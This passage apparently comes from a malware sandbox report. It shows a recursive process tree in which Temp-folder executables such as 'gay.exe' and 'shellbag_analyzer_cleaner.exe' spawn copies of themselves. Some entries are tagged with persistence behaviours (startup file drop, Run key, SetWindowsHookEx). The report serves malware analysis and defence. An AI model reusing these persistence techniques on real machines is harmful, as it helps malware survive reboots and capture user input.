C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"30⤵PID:6084
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"29⤵PID:1176
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:1012
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:4808
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:1176
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:6028
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:6020
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:5928
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:5320
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"21⤵PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"21⤵PID:2856
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:5796
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:4088
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:3636
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵
- Checks computer location settings
PID:3644 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:4344
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:1368
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"29⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"30⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"31⤵PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"31⤵PID:5552
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"30⤵PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"29⤵PID:5276
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:5412
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:4456
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:5312
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:3520
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:3620
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:2604
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:5516
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:2144
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"20⤵PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"20⤵PID:5064
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵
- Checks computer location settings
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:5612
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:5240
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:2804
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:1868
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"29⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"30⤵PID:2300
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"31⤵PID:3516
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"32⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"33⤵PID:3920
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"34⤵PID:5500
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"35⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"36⤵PID:4352
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"37⤵PID:2104
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"38⤵PID:1628
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"39⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"40⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"41⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"42⤵
- Checks computer location settings
PID:5816 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"43⤵PID:6064
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"43⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"42⤵PID:4120
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"41⤵PID:3856
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"40⤵PID:4748
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"39⤵PID:5376
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"38⤵PID:3516
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"37⤵PID:4808
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"36⤵PID:2900
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"35⤵PID:4564
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"34⤵PID:2632
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"33⤵PID:2608
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"32⤵PID:2900
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"31⤵PID:2060
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"30⤵PID:6020
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"29⤵PID:6120
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:3452
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:3284
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:624
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:5604
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:5188
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:5868
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:2348
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:5396
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"19⤵PID:6048
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"19⤵PID:2228
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:3224
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:2368
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:6128
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:5816
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:3736
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"18⤵PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"18⤵PID:5588
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵PID:1580
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"17⤵PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"17⤵PID:6136
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:5980
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵
- Checks computer location settings
PID:5128 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:5740
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:5604
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:3508
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:404
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"22⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"23⤵PID:4524
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"24⤵
- Checks computer location settings
PID:740 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"25⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"26⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"27⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"28⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"29⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"30⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"31⤵PID:5172
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"32⤵PID:1012
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"33⤵PID:5544
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"34⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"35⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"36⤵PID:5244
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"37⤵PID:3652
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"38⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"39⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"40⤵PID:4900
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"41⤵PID:1604
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"42⤵PID:3080
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"43⤵PID:1532
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"43⤵PID:2000
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"42⤵PID:5500
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"41⤵PID:5952
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"40⤵PID:6036
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"39⤵PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"38⤵PID:856
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"37⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"36⤵PID:3408
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"35⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"34⤵PID:5248
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"33⤵PID:6092
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"32⤵PID:3408
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"31⤵PID:6036
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"30⤵PID:2548
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"29⤵PID:1728
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"28⤵PID:3404
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"27⤵PID:3984
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"26⤵PID:4004
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"25⤵PID:1676
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"24⤵PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"23⤵PID:2600
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"22⤵PID:2032
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:2112
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:5212
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:6088
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"18⤵PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"17⤵PID:4264
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"16⤵PID:1532
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"16⤵PID:3972
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:3840
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"15⤵PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"15⤵PID:5812
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:6116
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"14⤵PID:3636
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"14⤵PID:4336
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵
- Checks computer location settings
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"16⤵PID:3404
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"15⤵PID:5472
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"14⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"C:\Users\Admin\AppData\Local\Temp\Nursultan Beta.exe"13⤵PID:5136
-
-
C:\Users\Admin\AppData\Local\Temp\rustme.exe"C:\Users\Admin\AppData\Local\Temp\rustme.exe"13⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"12⤵PID:2112
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"13⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"14⤵PID:5188
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"15⤵PID:3644
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"16⤵PID:3904
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"17⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"18⤵PID:3636
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"19⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"20⤵PID:4076
-
C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"C:\Users\Admin\AppData\Local\Temp\shellbag_analyzer_cleaner.exe"21⤵PID:5152
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"21⤵PID:5420
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"20⤵PID:856
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"19⤵PID:4368
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"18⤵PID:4456
-
-
-
C:\Users\Admin\AppData\Local\Temp\gay.exe"C:\Users\Admin\AppData\Local\Temp\gay.exe"17⤵PID:5356
-
-
-
